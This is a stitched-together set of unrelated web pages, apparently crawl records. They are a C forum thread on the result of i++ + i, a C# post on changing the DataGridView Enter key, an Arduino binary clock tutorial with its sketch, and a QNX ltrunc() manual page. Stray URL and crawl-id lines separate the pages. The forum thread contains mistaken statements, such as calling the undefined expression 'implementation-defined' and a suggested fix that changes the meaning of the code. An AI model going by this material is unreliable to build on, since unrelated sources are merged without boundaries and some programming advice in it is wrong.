My C/C++ professor mentioned in class that many compilers cannot properly evaluate the expression i++ + i and some permutations of it, so I decided to test that out in Visual Studio with a small program: #include <stdio.h> int main ( void ) { int i = 4; printf("%i", i++ + i); return 0; } It returns 8. It should return 9. Why does it return 8? My C/C++ professor mentioned in class that many compilers cannot properly evaluate the expression i++ + i and some permutations of it, so I decided to test that out in Visual Studio with a small program: Why should it return 9? i++ is evaluated AFTER printf. printf("%i", ++i + i) would return 9. Um, are you sure about that? Surely for i++ + i it should go: i++ equates to 4 (then increments i to 5) + i equates to 9 then printf should display the result of 9. For ++i +i it'd be: ++i (increments i to 5) and equates to 5 +1 equates to 10 Although I may be wrong, I always did hate pre/postfix incrementing when mixed with other operators. - AndyC wrote:Um, are you sure about that? Surely for i++ + i it should go: It should, all things being equal. But thanks to the malarky called sequence points, it isn't the case. Basically, about expressions with side effects like i++, C guarantees only that the side effects will be completed at a sequence point (section 1.9, paragraph 7: "At certain specified points in the execution sequence called sequence points, all side effects of previous evaluations shall be complete and no side effects of subsequent evaluations shall have taken place" (that's the C++ standard but I believe the same applies for C). The standard specifies where sequence points exist, which includes at the end of a full expression (1.9 paragraph 16) but not inside a subexpression. As such the result of the side effect of i++ is only guaranteed to be visible after the full expression i++ + i has been evaluated. Because the standard also doesn't guarantee that the side effects won't be visible yet, the statement above is undefined by the standard and therefore compiler dependent. Some compilers might return 8, othes might return 9. As such, I would strongly recommend against having those kinds of expressions in your program. I wonder what i++ + ++i would evaluate to... Begs the question, how much + would a c ++, if a c + could + c? - TommyCarlier wrote:I wonder what i++ + ++i would evaluate to... Sven already gave you all the information you need to answer that. It's undefined. Not to mention evil. - TommyCarlier wrote:I wonder what i++ + ++i would evaluate to... Going by operator precedence tables, it should be evaluated as follows, assuming i = 4: i++ + ++i (i = 4) 4 + ++i (i = 5) 4 + 6 (i = 6) 10 (i = 6) That's why I never liked the ++ and -- operators; confusing. But because of the sequence points business, it could also be 9. - littleguru wrote:That's why I never liked the ++ and -- operators; confusing. Me too. I always just introduce temporary variables when expressions start to get complex and work on the principle that the optimizer will most likely make them go away whilst leaving much more readable code. Long live i += 1 ! Why does this work in C# then? Whats going on beneath that's different? class Program { static void Main(string[] args) { int i = 4; Console.Write(i++ + i); Console.ReadLine(); } } Answer = 9; - vesuvius wrote:Why does this work in C# then? Because the C(++) standard has no bearing on the semantics of C#. The C standard defines an abstract machine for the execution of programs, which as I've stated above defines this notion of sequence points which causes the results of this statement to be implementation-defined. The C# standard also defines an abstract machine (actually, I think it's the CLI standard that defines the abstract machine that C# runs on) but its semantics can be (and probably are) completely different. I have no idea what guarantees it makes considering statements like this; it might guarantee their correctness or it might leave it to the implementation like C does. In the latter case, the fact that Microsoft's compiler does it correctly would be coincidence and not something you can rely on to be true in other compilers (e.g. Mono). But if the standard does define it (I don't know if it does, I haven't read the C# and CLI standards as closely as the C++ standard) you can depend on it. Bottom line: in C (and C++) the result of these expressions is implementation-defined. But that means nothing for other languages. It's also nonsense like this that made the VB team decide to keep these unary operators out of VB, even though they did introduce the += style operators in VB2005. Just use: [code] i += i + 1; [/code] - tgraupmann wrote:Just use: [code] i += i + 1; [/code] That does something completely different from the original code. - Sven Groot wrote:But because of the sequence points business, it could also be 9. It probably is 9 in Visual Studio, but it should be 10. - Shining Arcanine wrote: It probably is 9 in Visual Studio, but it should be 10. No, I checked it, it's 10. I guess the ++i causes it to re-read i for the second access (which is sort of required in this case to ensure the correct final value of i). Thread Closed This thread is kinda stale and has been closed but if you'd like to continue the conversation, please create a new thread in our Forums, or Contact Us and let us know.
https://channel9.msdn.com/Forums/TechOff/261908-i--4-i--i-should-return-9-but-returns-8
CC-MAIN-2015-27
refinedweb
962
70.73
Jim O'Neil Technology Evangelist As I’m sure you've heard, Windows Phone 8 and Windows Store (nee Metro) applications share a common core operating system, and that’s great news for developers looking to take advantage of both platforms with a single or complementary applications. The common core does not, however, mean that the platforms are identical – in fact, only about 1/3 of the Windows Runtime API members are available on both platforms, and there are some APIs that are specific to either Windows Phone or Windows 8 due the unique experiences or features of the hardware. Then, of course, there’s a .NET API available for both Windows Store applications and Windows Phone applications each a somewhat differing subset of the complete .NET API you’ve been using to build Windows Forms, WPF and ASP.NET applications for years. As someone that’s been transitioning his skills from core .NET development to the Windows Runtime, I share the pain of trying to make that call to API X and finding it’s not supported on Windows 8 (or Windows Phone) or wondering why the namespace that I’ve used for years refused to resolve in a new Windows 8 app. The good news is that the documentation is there, but there are some subtleties and nuances, so I’ve pulled this post together to outline some of the tricks and links I’ve discovered. First of all, here are the itemized lists of APIs for the new platforms If you're like me though, one of your primary research tools is a Bing search, and I'm generally looking for the hit that brings me right to the font of knowledge: the MSDN Library. Once there, it can be a bit tricky to determine if what you're looking at applies to your specific case. Is it available for Windows 8 Store apps? Is it available for Windows Phone? What about Windows Phone 8 versus 7.1? At the high level, you’ll find yourself dealing with three namespaces: and if you’re doing native development, of course, you’ll be looking at Win32 API calls. If you see a Windows namespace, you’ll know it’s for use with Windows 8 or Windows Phone 8 applications – but not necessarily both! Let’s take a look at the LocalFolder property that’s part of the Windows.Storage namespace. If you do a search for LocalFolder, you might end up at one of two landing spots on MSDN. On the left is the documentation page for the LocalFolder property on the Windows Dev Center, and on the right is the documentation for the Windows Phone Dev Center. Windows Dev Center Windows Phone Dev Center This feature is supported on both devices, and you’ll see that the documentation is nearly identical (the Windows Dev Center version provides JavaScript samples, and the phone version does not since JavaScript is not a supported native language on Windows Phone). At the bottom of each, you’ll see the listing of platform support as well: If you run into an API on either site, and there’s not a “Minimum supported” section for client or phone, that’s your cue that you’re not dealing with one of the 2800 or so APIs that are shared in the common core. Unfortunately, the converse isn’t true. Take a look at the page for ApplicationData.RoamingSettings on the Windows Dev Center, and you’ll see a similar statement of support for Windows Phone 8 in the Requirements section. Try to use that feature in a Windows Phone 8 application with code like the following: String bar = ApplicationData.Current.RoamingSettings.Values["foo"] as String; and you’ll get an exception! That’s because the API is technically supported, but it’s not implemented. Bottom line, you can’t use it in a Windows Phone 8 application. Here’s how you’d know: When working with Windows Forms, ASP.NET, WPF, and the other .NET technologies, these two namespaces are your bread and butter. You’ll find a subset of these namespaces available for both Windows 8 and Windows Phone, and there are a few additions to the Microsoft namespace for new features as well (e.g., the Microsoft.Phone namespace). You now could find yourself at three different landing pages, such as the documentation incarnations of System.IO below: MSDN Library Of course, if you hit the Windows Dev Center and you’re writing a Windows 8 app, you’re all set; likewise, for the Windows Phone Dev Center when writing a Windows Phone app. If you end up at the core MSDN Library, there are actually even more choices, since there’s a Version drop down taking you all the way from the current .NET Framework 4.5 back in time to 1.1! On the page for the .NET Framework 4.5, you’ll notice there are glyphs decorating each of the classes, methods, properties, events, etc. The first should be familiar – it differentiates classes from structures from delegates from enumerations and so on, but there are a couple of new glyphs too, as noted below: This shows that both BinaryReader and BinaryWriter are available (in whole or part) for Windows Store apps, and they are also supported in Portable Class Libraries. Support of a feature in a portable class library bodes well for being able to reuse code across multiple platforms, such as Windows 8 and Windows Phone 8; however, it doesn’t guarantee it. While .NET and Windows Store have a considerable amount of overlap in support, as you add additional options – like Windows Phone – to your portable class library target frameworks, the combined API surface decreases. Looking more closely at BinaryReader, the Version Information section (toward the bottom of the page) provides additional detail on the applicability of the class: This works well for Windows Store applications, but you’ll note that there is no mention of Windows Phone support here, even though BinaryReader is absolutely supported on that platform. In fact, Directory, which is neither available for Windows Store nor for use in a portable class library is supported in Windows Phone, yet the core MSDN documentation wouldn’t really clue you in to that. If you’re using Win32 APIs, let’s use FlushFileBuffers as an example, Windows Store support is noted in the Requirements section at the end of the documentation page. FlushFileBuffers is also available on Windows Phone 8 though. And the way you’d know that is by looking more closely at the Remarks section which includes this callout: As you might note, that's nearly the opposite approach as taken for the Windows namespace, where the Requirements section may indicate support for Windows Phone 8 but the Remarks section shows it’s actually not implemented and will thrown an exception. If you’ve read the entire post, that's probably more info than you cared to know, and I do suspect the various documentation 'centers' will align as they evolve over time. For now, if you're just writing Windows Store apps, be sure to navigate to the Windows Dev Center pages; likewise, visit the Windows Phone Dev Center if you're just writing Windows Phone 8 apps. But, if you’re working to reuse your code across both target platforms, you may want to file this post away so you can properly decode what you can and can’t use across the two.
http://blogs.msdn.com/b/jimoneil/archive/2013/01.aspx?PageIndex=1&PostSortBy=MostViewed
CC-MAIN-2016-07
refinedweb
1,252
56.39
Welcome to the monte carlo simulation experiment with python. Before we begin, we should establish what a monte carlo simulation is. The idea of a monte carlo simulation is to test various outcome possibilities. In reality, only one of the outcome possibilities will play out, but, in terms of risk assessment, any of the possibilities could have occurred. Monte carlo simulators are often used to assess the risk of a given trading strategy say with options or stocks. Monte carlo simulators can help drive the point home that success and outcome is not the only measure of whether or not a choice was good or not. Choices should not be assesed after their outcome. Instead, the risks and benefits should only be considered at the time the decision was made, without hindsight bias. A monte carlo simulator can help one visualize most or all of the potential outcomes to have a much better idea regarding the risk of a decision. With that, let's consider a basic example. Here, we will consider a gambling scenario, where a user can "roll" the metaphorical dice for an outcome of 1 to 100. If the user rolls anything from 1-50, the "house" wins. If the user rolls anything from 51 to 99, the "user" wins. If the user rolls a 100, they lose. With this, the house maintains a mere 1% edge, which is much smaller than the typical house edge, as well as the market edge when incorporating trading costs. For example, consider if you are trading with Scottrade, where the house takes $7 a trade. If you invest $1,000 per stock, this means you have $7 to pay in entry, and $7 to pay in exit, for a total of $14. This puts the "house edge" to 1.4% right out of the gate. Notably, Scottrade is not the actual house. The house is just not you. This means that, on a long term scale, your bets need to do better than 1.4% profit on average, otherwise you will be losing money. Despite the small number, the odds are already against you. Trading is a 50/50 game, especially in the short term. A monte carlo generator can also help illustrate the flaws of the gambler's fallacy. Many gamblers, and sometimes especially gamblers who understand statistics, fall prey to the gambler's fallacy. The fallacy asserts that, taking something like the flipping of a coin for heads or tails, you have a known 50/50 odds. That said, if you just flipped heads five times a row, somehow you're more likely to flip tails next. No matter how many heads have preceeded, your odds, each time you flip the coin are 50/50. It is easy to fall into the trap of thinking that on a long term scale odds will correlate to 50/50 therefor if the odds are imbalanced currently then the next flip's odds are also not 50/50 So again, with our example in mind, 1-50, house wins. 51-99 user wins. A perfect 100 means house wins. Now, let's begin. We first need to create our dice. For this, we'll employ the pseudo random number generator in python. import random def rollDice(): roll = random.randint(1,100) return roll # Now, just to test our dice, let's roll the dice 100 times. x = 0 while x < 100: result = rollDice() print(result) x+=1
https://pythonprogramming.net/monte-carlo-simulator-python/
CC-MAIN-2021-39
refinedweb
576
73.98
Chapter 13. Arrays and Collections In programming, you often need to work with collections of related data. For example, you may have a list of customers and you need a way to store their email addresses. In that case, you can use an array to store the list of strings. In .NET, there are many collection classes that you can use to represent groups of data. In addition, there are various interfaces that you can implement so that you can manipulate your own custom collection of data. This chapter examines: Declaring and initializing arrays Declaring and using multidimensional arrays Declaring a parameter array to allow a variable number of parameters in a function Using the various System.Collectionsnamespace interfaces Using the different collection classes (such as Dictionary, Stacks, and Queue) in .NET Arrays An array is an indexed collection of items of the same type. To declare an array, specify the type with a pair of brackets followed by the variable name. The following statements declare three array variables of type int, string, and decimal, respectively: int[] num; string[] sentences; decimal[] values; Array variables are actually objects. In this example, num, sentences, and valuesare objects of type System.Array. These statements simply declare the three variables as arrays; the variables are not initialized yet, and at this stage you do not know how many elements are contained within each array. To initialize an array, use the new keyword. The following statements declare and initialize ... Get C# 2008 Programmer's Reference now with O’Reilly online learning. O’Reilly members experience live online training, plus books, videos, and digital content from 200+ publishers.
https://www.oreilly.com/library/view/c-2008-programmers/9780470285817/ch13.html
CC-MAIN-2021-49
refinedweb
272
54.52
12 Hr Binary Clock, Hours and Minutes Only, DS1307 RTC, I2C, Arduino-Nano Introduction: 12 Hr Binary Clock, Hours and Minutes Only, DS1307 RTC, I2C, Arduino-Nano For a while now I have wanted to make a binary clock, but after looking around I decided I wanted something just a bit different. So I decided to only display the hours and minutes and only display a 12 hours clock, this means you only need 3 columns and the pattern of LED’s looks neater. Also with only 11 LED’s you don’t need to multiplex, you can just drive the LEDs on the output pins directly. So with the above in mind I had decided on the design, all I really needed was a suitable case and while I was sat in front of my computer I realised the small speaker would make an idea case. So the basic set up is 11 LED's and resistors linked to a Arduino NANO, a DS1307 RTC connected to the NANO via i2C and then two buttons to adjust the hours and minutes, all fitted into a "dumb" speaker using 5volts supply from the active usb powered speaker. Step 1: The LED Board So to start with I am using 5mm Green LEDS and these along with the resistors are all soldered onto a small piece of breadboard 17 tracks wide by 17 long. The resistors are 470ohm and as you can see in the photos I have soldered 3 on the correct side of the breadboard but the rest of the resistors and the links were soldered onto the track side (the wrong side) Where the legs of the resistors go over other tracks I have covered them using insulation stripped from single core wire. Have a good look at the photos as there are several track breaks under some resistors. All the resistors have a common ground, which means that 3 of the tracks are ground which allows the RTC and Arduino nano to get the ground from the breadboard. I haven’t gone into much detail about the LED board as it’s not too hard to complete, and you may wish to change the spacing. The 11 LEDs connect to pins 2 to 12 on the nano (via a 470ohm resistor) it doesn’t really matter which order you put them as long as you define the order in the sketch. After I had completed the LEDs and resistors and links I soldered on different coloured wires to the edge and then checked each LED worked. Just in case you don't understand Binary clocks, the right column displays the units of minutes (0-9) the middle column displays the tens of minutes (0-5) and the left column displays the hours (1-12). In all cases the bottom LED is worth 1 the second is worth 2 the third 4 and the 4th is worth 8, to get the time you add up all the LED's in the column which are illuminated to give the number. You may have spotted in one of the pictures above that I managed to pick up the wrong value resistor and solder it in place. I spotted it and replaced it as I did the links. Step 2: The Aduino Nano. Once the LED board was complete and checked to be working I Then used foam double sided tape and stuck the Arduino Nano on top of the resistors. Then looped the previously connected wired from the breadboard to the input pins, at this stage I just soldered then all in place neatly not worrying about the pin order, the last connection from the breadboard to the Nano is the ground, again to keep it neat I choose the ground pin next to the digital pin 2. Step 3: RTC DS1307 Connected Via I2C Next to be wired is the RTC module, the Tiny RTC I2C DS1307 Clock Module was brought from Ebay and cost about £1.00. It connects to the nano via i2C on pins A4 and A5 (A5 SCL and A4 SDA). The module also needs a ground and 5volt, the ground was from the breadboard and the 5 volts was from the VCC pin next to A4. The RTC module will be foam tapped to the speaker so the wires are about 5” long. Step 4: Hour and Minute Adjust Buttons. The buttons were what I had laying around, they are a bit too big and I would have preferred black, but that are what I had and as they are mounted on the back it doesn’t really matter. I chose to mount the buttons either side of the cable entry hole. The holes had to be 12mm so I drilled in steps and at 9mm I filed to the correct size aligning the holes so they looked even. All the wires were then connected, the buttons to the nano (via the inline resistors) and the 4 core speaker and USB cable to the relevant connections (ground and “RAW” on the nano) The buttons are single pole, normally open (momentary close). They are wired so they are pulled down to ground via a 10K resistor and set to 5volts when the button is pressed. A 1k resistor is on each input to the nano. I decided to connect the resistors to the wires as shown in the photos, it’s a neat way to connect the switches and as long as you cover the connections with heatshrink you shouldn’t have any problems with shorts. The two buttons connect to A0 and A1 which can be configured to digital by adding 14 to the pin number so pin A0 is 14 and A1 is 15. One button is for the hour adjust and the other for the minutes, each button just adds either a minute or hour to the clock. Step 5: Fitting the Clock Into the Speaker The speaker looked ideal to house the LED’s and as the speakers were amplified I could use the USB voltage to power the clock. However the speaker which has the amplifier and the USB 5 volts didn’t have room for the clock so the “slave” speaker was going to be used to house the clock, I was then going to run an extra pair of wires from the amplified speaker to the slave to supply the 5 volts. I then had a light bulb moment and realised I could use an old USB keyboard cable and replace the existing 2 wire cable. This meant a little more work but I think it was worth it. One thing I will point out is that you should not use a mouse cable as within each core of the 4 wires are fibres of plastic? So it is a bit harder to work with. The keyboard cable is slightly bigger in diameter but the cores don’t have fibres in them and are a bigger diameter. You can see in the photos the 4 connections I made at each end. In one photo you can see the difference in the mouse cable and keyboard cable, the green wire is the mouse cable and has plastic strands in each core, the red wire is from the keyboard and is tinned copper. To mount the LEDs in the slave speaker I firstly masked the front with tape then marked out the 11 holes. Because I have used breadboard the spacing is nice and even with each column 0.5” apart and 0.4” between LEDs in each column. Take care not to get carried away and drill out the middle top LED, as there isn’t an LED in that position! When drilling the masking tape helps to stop the drill bit wondering and if you start with a 2mm drill you can check everything is in line before drilling bigger, and even then I prefer to drill in steps using a 3.3mm drill then lastly 5mm. Step 6: The Arduino NANO Program Explained and Libraries Needed/ The program uses the RTC library and the time library which was downloaded from: Make sure you unzip the libraries into the Arduino/ libraries file. I then programed the binary clock using a simple decimal to binary code. However I had a few problems as the RTC returns a time value in 24 hour format, so to overcome this problem I firstly check if the hours is zero and if it is, set it to 12. Then if the hour’s value is greater than 13 then I subtract 12. That sorts out the 24 hour time. Then we come to setting the time, the hours and minutes are adjusted by adding to the “raw” time code, 60 is added for each minute and 3600 for each hour. if (digitalRead(setM) == HIGH) { unsigned long j = RTC.get(); j = j + 60; RTC.set(j); } if (digitalRead(setH) == HIGH) { unsigned long j = RTC.get(); j = j + 3600; RTC.set(j); } There is a little problem with this code, if you load this code into your Arduino and nothing happens then you may need to set the RTC using the “setTime” sketch in the Sketchbook/libraries/DS1307RTC/setTime file. Once loaded click the serial monitor to check the time is correct, from what I can work out if you buy a new RTC module it needs to be “started” else it won’t be active. Then reload the binaryRTC code again and everything should work. I have listed the code, but please note I am not very good at programming so don’t expect too much! Step 7: The Full Program. #include <Wire.h> #include <Time.h> #include <DS1307RTC.h> const int setH = 14; //button for hour increase const int setM = 15; // button for minute increase const int UnitMin01 = 12; const int UnitMin02 = 9; const int UnitMin04 = 8; const int UnitMin08 = 7; const int UnitTen01 = 2; const int UnitTen02 = 11; const int UnitTen04 = 10; const int UnitHrs01 = 3; const int UnitHrs02 = 4; const int UnitHrs04 = 5; const int UnitHrs08 = 6; void setup() { delay(200); pinMode(setH, INPUT); pinMode(setM, INPUT); pinMode(UnitMin01, OUTPUT); pinMode(UnitMin02, OUTPUT); pinMode(UnitMin04, OUTPUT); pinMode(UnitMin08, OUTPUT); pinMode(UnitTen01, OUTPUT); pinMode(UnitTen02, OUTPUT); pinMode(UnitTen04, OUTPUT); pinMode(UnitHrs01, OUTPUT); pinMode(UnitHrs02, OUTPUT); pinMode(UnitHrs04, OUTPUT); pinMode(UnitHrs08, OUTPUT); } void loop() { tmElements_t tm; if (RTC.read(tm)) { if (digitalRead(setM) == HIGH) { unsigned long j = RTC.get(); j = j + 60; RTC.set(j); } if (digitalRead(setH) == HIGH) { unsigned long j = RTC.get(); j = j + 3600; RTC.set(j); } binaryOutputHours(tm.Hour); binaryOutputMinutes(tm.Minute); } delay(1000); } void binaryOutputHours(int number) { if (number == 0) { number = 12; } if (number >= 13) { number = number - 12; } setBinaryHours(number); } void binaryOutputMinutes(int number) { if (number >= 10) { int tens = number/10; int units = number - (tens*10); setBinaryMins(units); setBinaryTens(tens); } else { int tens = 0; int units = number; setBinaryMins(units); setBinaryTens(tens); } } void setBinaryMins(int units) { if (units >= 8) { digitalWrite(UnitMin08, HIGH); units = units - 8; } else { digitalWrite(UnitMin08, LOW); } if (units >= 4) { digitalWrite(UnitMin04, HIGH); units = units - 4; } else { digitalWrite(UnitMin04, LOW); } if (units >= 2) { digitalWrite(UnitMin02, HIGH); units = units - 2; } else { digitalWrite(UnitMin02, LOW); } if (units >= 1) { digitalWrite(UnitMin01, HIGH); units = units - 1; } else { digitalWrite(UnitMin01, LOW); } } void setBinaryTens(int tens) { if (tens >= 4) { digitalWrite(UnitTen04, HIGH); tens = tens - 4; } else { digitalWrite(UnitTen04, LOW); } if (tens >= 2) { digitalWrite(UnitTen02, HIGH); tens = tens - 2; } else { digitalWrite(UnitTen02, LOW); } if (tens >= 1) { digitalWrite(UnitTen01, HIGH); tens = tens - 1; } else { digitalWrite(UnitTen01, LOW); } } void setBinaryHours(int hours) { if (hours >= 8) { digitalWrite(UnitHrs08, HIGH); hours = hours - 8; } else { digitalWrite(UnitHrs08, LOW); } if (hours >= 4) { digitalWrite(UnitHrs04, HIGH); hours = hours - 4; } else { digitalWrite(UnitHrs04, LOW); } if (hours >= 2) { digitalWrite(UnitHrs02, HIGH); hours = hours - 2; } else { digitalWrite(UnitHrs02, LOW); } if (hours >= 1) { digitalWrite(UnitHrs01, HIGH); hours = hours - 1; } else { digitalWrite(UnitHrs01, LOW); } } Mr_fid Love the clock. Built it on a breadboard. Having problems with code. I would like for you to take a look and see where I'm off. What's a good way to send it to you? I've copied some of the errors for you to get a brief glimpse. C:\User\Snoopy's_blah_blah_blah\documents\arduino\_12_Hr_Binary_Clock\_12_Hr_Binary_Clock.ino: In function 'Void Loop'()': _12_Hr_Binary_Clock:43: Error: 'tmElements_t' was not declared in this scope tmElements_t tm; ^ _12_Hr_Binary_Clock:44: error: 'RTC' was not declared in scope if (RTC.read(tm)) ^ There are more errors than that, but it's a good example to start with. Some of the post talk about the RTC Library. I believe I've installed them in the library correctly. (IDE; Sketch; drop down menu; include library DS1307RTC) (download Zip. IDE; Sketch; drop down menu; Include library; Add .Zip Library) Know it has to be a programing / library issue. The problem is I'm learning this all the hard way. No formal classes or instructors just a few books (Programming Arduino, Simon Monk) Any help would be both great and educational. (chalk one more up for hard knocks) Thanks Thanks for your comments, and hopefully as a bit of encouragement.... this was one of my first programs with the Arduino, and just like you i took the same path learning on my own with the help of Simon Monk's book! And the program is really really bad! (but works) its written in a very poor style! One of my first problems was the libraries, what i did was to get the DS1307RTC library and put the "DS1307RTC" folder into the libraries folder, which should be in the Arduino folder in my Documents. Also another Library is needed, Time should also be added to the librarys folder and can be downloaded from give those two bits a try and in the meantime i am cleanng up this program listing to make it easyer to read. Hello Sir. I've finally got the clock working on the breadboard. Had to do some rewiring (switches) and much reading and studying (in between my farming). Now to finalize it into a permanent container. Thanks so much for making the original and inspiring the rest of us too. I'll post a picture of the final product when it's complete. This looks great! I have a Binary Clock Widget on my phone. How accurate is your clock? Just to update this comment... I have had the clock running for a few weeks now and I can see it gains about 9 seconds day. so when I get a chance I will update the program to subtract 9 seconds each morning? Ha! That's a great soluition! That's a good question, this was the second one I made and as yet I haven't run it for more than one day. However the original unit did lose time. So I was going to keep a note of the new RTC and work out how much the clock loses/gains and change the program so it corrects the clock every day. That's providing it always loses/gains time and not both (if you see what I mean)
http://www.instructables.com/id/12-Hr-Binary-Clock-hours-and-minutes-only-DS1307-R/
CC-MAIN-2017-34
refinedweb
2,516
65.96
On Thu, 21 Feb 2008 13:08:11 +0100, Xavier Oswald wrote: > > I don't have a compelling reason to jump and adopt this package; > > however, I know many modules in the Authen::* namespace were recently > > grabbed by Xavier Oswald. Xavier, or anybody in the group: Are you > > interested? :) > Yes Im interested ! My libauthen-simple-smb-perl depends on libauthen-smb-perl ! > Im upstream of a project which will use it. I will work on it today. Good. FWIW: #432809 is an RC bug against libauthen-smb-perl, but I think Barry's proposed patch is not the best solution, I agree more with Michael's reasoning in the original report. Cheers, gregor -- .''`. | gpg key ID: 0x00F3CFE4 : :' : debian: the universal operating system - `. `' member of | how to reply: `- A woman should have compassion. -- Kirk, "Catspaw", stardate 3018.2
http://lists.debian.org/debian-perl/2008/02/msg00071.html
CC-MAIN-2013-20
refinedweb
137
75.81
info_outline Solutions will be available when this assignment is resolved, or after a few failing attempts. Time is over! You can keep submitting you assignments, but they won't compute for the score of this quiz. Make a car that can drive! Create a class Car that is initialized by providing one mandatory argument: electric. It will have a method called drive that returns the sound the car makes. Make sure the text for the sound output matches the example. You can access the attributes in the drive method from the self variable. Example: car1 = Car(electric=False) print(car1.electric) # False print(car1.drive()) # 'VROOOOM' car2 = Car(electric=True) print(car2.electric) # True print(car2.drive()) # 'WHIRRRRRRR' Test Cases test drive not electric - Run Test def test_drive_not_electric(): car1 = Car(electric=False) assert isinstance(car1, object) is True assert hasattr(car1, 'electric') is True assert car1.electric is False assert car1.drive() == 'VROOOOM'
https://learn.rmotr.com/python/introduction-to-programming-with-python/intro-to-oop/make-a-car-that-can-drive
CC-MAIN-2018-22
refinedweb
153
70.19
Mayabi: mlab¶ ||\<#80FF80> This page is about the tvtk.tools.mlab module. You are strongly advised to use the more recent mayavi.mlab module which can also be used from ipython -wthread or as a library inside another application.|| The `¶ ||\<#FF8080> Important: All these examples must be run in "ipython -wthread" or in a Wx application (like pycrust, or the Mayavi2 application). They will not work if you don't use this option.|| Start with `ipython -wthread` and paste the following code:: import scipy # prepare some interesting function: def f(x, y): return 3.0*scipy.sin(x*y+1e-4)/(x*y+1e-4) x = scipy.arange(-7., 7.05, 0.1) y = scipy.arange(-5., 5.05, 0.1) # 3D visualization of f: from enthought.tvtk.tools import mlab fig = mlab.figure() s = mlab.SurfRegular(x, y, f) fig.add(s) from scipy import * [x,y]=mgrid[-5:5:0.1,-5:5:0.1] r=sqrt(x**2+y**2) z=sin(3*r)/(r) from enthought.tvtk.tools import mlab # Open a viewer without the object browser: f=mlab.figure(browser=False) s=mlab.Surf(x,y,z,z) f.add(s) s.scalar_bar.title='sinc(r)' s.show_scalar_bar=True # LUT means "Look-Up Table", it give the mapping between scalar value and color s.lut_type='blue-red' # The current figure has two objects, the outline object originaly present, # and the surf object that we added. f.objects[0].axis.z_label='value' t=mlab.Title() t.text='Sampling function' f.add(t) # Edit the title properties with the GUI: t.edit_traits() List of different functionalities¶\ MayaVi1's imv.surf like functionality that plots surfaces given x (1D), y(1D)\ and z (or a callable) arrays. * SurfRegularC\ Also plots contour lines. * TriMesh\ Given triangle connectivity and points, plots a mesh of them. * FancyTriMesh\. * FancyMesh\ Like mesh but shows the mesh using tubes and spheres. * Surf\ This generates a surface mesh just like Mesh but renders the mesh as\ a surface. * Contour3\ Shows contour for a mesh. * ImShow\ Allows one to view large numeric arrays as image data using an image\ actor. This is just like MayaVi1's `mayavi.tools.imv.viewi`. To see nice examples of all of these look at the `test_*` functions at the end of this file. Here is a quick example that uses these test functions: from enthought.tvtk.tools import mlab f = mlab.figure() mlab.test_surf(f) # Create a spherical harmonic. f.pop() # Remove it. mlab.test_molecule(f) # Show a caffeine molecule. f.renwin.reset_zoom() # Scale the view. f.pop() # Remove this. mlab.test_lines(f) # Show pretty lines. f.clear() # Remove all the stuff on screen. Section author: ArndBaecker, GaelVaroquaux, Christian Gagnon Attachments
http://scipy-cookbook.readthedocs.io/items/MayaVi_mlab.html
CC-MAIN-2018-26
refinedweb
451
62.54
The DataGridView is a terrific control built into .NET that provides a customizable table for entering and displaying data. If you provide the DataGridView in your software as a means for the user to enter multiple rows of data, you may wish to redefine the default behavior of the Enter key. By default, when you press the Enter key in the DataGridView, the cursor moves to the cell in the same column immediately below the current cell (red arrow in the image below). But when entering multiple rows of data, a better response from the Enter key would be to move the cursor to the first cell in the next row (blue arrow). To do this, you can derive a new class from the DataGridView: public class Grid : DataGridView { Then override the OnKeyUp protected method as follows: protected override void OnKeyUp( KeyEventArgs e ) { if (e.KeyCode == Keys.Enter) { int currentRow = this.CurrentRow.Index; if (currentRow >= 0) this.CurrentCell = this.Rows[currentRow].Cells[0]; } base.OnKeyUp( e ); } Of course, if you wish to provide this capability for an existing DataGridView, you can simply subscribe to the KeyUp event and execute the same code above in the event handler. i have search this solution couple of hours. Am really happy to find this solution. thanks me too 🙂 thanx for the above mentioned code, but just being a new programmer, please clearify my doubt : even if i derive a new class grid, how can we use that class in our code, what i mean is datagridview is a control,so dont we have to work with the same object,say dtg1 ? and when we will press enter key in dtg1,how overriden method from grid class will get called?? i know i might be asking a childish one, but just want to clear my concept,please reply Swaroop, there are two ways to use a derived DataGridView control: 1. You can add your derived DataGridView to the Toolbox, then drag and drop your derived object onto your Design view. 2. You can edit the designer-generated code directly and replace the DataGridView class name with your derived class name. Note that this must be done in two places: the object definition, and the statement that creates the object. timm: i only made change in InitializeComponent() I dont know where to find Statement that creates the object in designer code. Thank you @Boki – I think that would be enough, I also here and it worked fine. Thank you everybody! protected override void OnKeyDown( KeyEventArgs e ) { if (e.KeyCode == Keys.Enter) { e.Keysupress = true; //suppress ENTER SendKeys.Send(“{Tab}”); //Next column (or row) } base.OnKeyDown( e ); } protected override void OnKeyDown( KeyEventArgs e ) { if (e.KeyCode == Keys.Enter) { e.Keysupress = true; //suppress ENTER SendKeys.Send(“{Tab}”); //Next column (or row) } base.OnKeyDown( e ); } use upper coading for move the cursur to next colom but enter the date and press enter key then cursur move next rows.then shoud be sam rows. pease give coading for upper problums. hi, I need a similar solution. when pressing the Enter key, I would like to “stay” at the same cell, but entering a new line (such as Ctrl+Enter does). can you help? Tomer. I am really new to vb. I have the same problem as above but I use .net not C#. How do I convert this info for my use and where in the code do I put the code? My DataGridView is named Senior_dataDataGridView. I have tried many so called solutions but non have worked for me, probably because I don’t know where to put the code at and I have never had a .net solution. I you could help me I would really appreciate it. Hi Bill, I am a C# programmer I was looking for the same solution in C# but I found of VB.NET.. you can check it here.. This is tough. I’m not calling you out though, I think it is everyone else out there that isn’t taking notice. how to use the above code ,doi need to create the object if so where ,in event fire? Nice its working good but it should go down and come back up how make that but its very good Hi its working good but it should go down and come back up ….but i write some validations for every cell…validations false means i got error..how can i solve this issue…i want validations and also enter key…please help me anybody ….my id… Thanks,for this solution but i edit the cell,it doesn’t work,any suggestions?
http://www.csharp411.com/enter-key-in-datagridview/
CC-MAIN-2017-22
refinedweb
770
72.97
for connected embedded systems ltrunc() Truncate a file at a given position Synopsis: #include <sys/types.h> #include <unistd.h> off_t ltrunc( int fildes, off_t offset, int whence ); Arguments: - fildes - The file descriptor of the file that you want to truncate. -trunc()). Returns:. Errors: - EBADF - The fildes argument isn't a valid file descriptor, open for writing. - EINVAL - The whence argument isn't a proper value, or the resulting file size would be invalid. - ENOSYS - An attempt was made to truncate a file of a type that doesn't support truncation (for example, a file associated with the device manager). - ESPIPE - The fildes argument is associated with a pipe or FIFO. Examples: ; } Classification: Caveats: The ltrunc() function isn't portable, and shouldn't be used in new code. Use ftruncate() instead. See also: errno, ftruncate(), lseek()
http://www.qnx.com/developers/docs/6.3.2/neutrino/lib_ref/l/ltrunc.html
crawl-003
